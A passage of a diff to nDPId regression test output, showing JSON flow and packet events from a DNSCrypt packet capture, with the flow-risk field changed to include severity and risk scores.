AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02420{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":946739312402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAAXc7uIgAL0R6GwKAAABXV\/ipZ6TAbsGBGH4x+cBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":272,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7uIAub0RDUAKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":272,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":946739312405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739312405,"pkt":"ZmZmZmZmRERERERECABFAADUFOtAADYRDapCVR5zCgAAAQG7nKMAwIXDLCqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="}
@@ -570,26 +570,26 @@
 00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":946739312466,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739312466,"pkt":"ZmZmZmZmRERERERECABFAADTA\/UAADYRf2RdX+KlCgAAAQG75jgAv7Apx+iBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAEQUmbKEod9nlyKPPrQqGP9Ls8t6H\/YHI72RThtMayAXvqOxd6z058i8UJ7+KMLpc+YgjKuAGDN2+1oeB3OFIgnw9LuNjyX7NTXMUO6Dulhi3d3ExK4wLeAsg632WDfaPfD0u42PJfs1X1OugV9TroFfVQAB"}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsFAAL0RhlMKAAABM56mYZCrAbsCCJzVB2IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsIgAL0RopIKAAABM56mYbiZAbsGBBC9B18BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":281,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsIAub0Rx2UKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":281,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsMgAL0RopEKAAABM56mYbPyAbsGBBVmB10BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":283,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsMAub0Rx2QKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
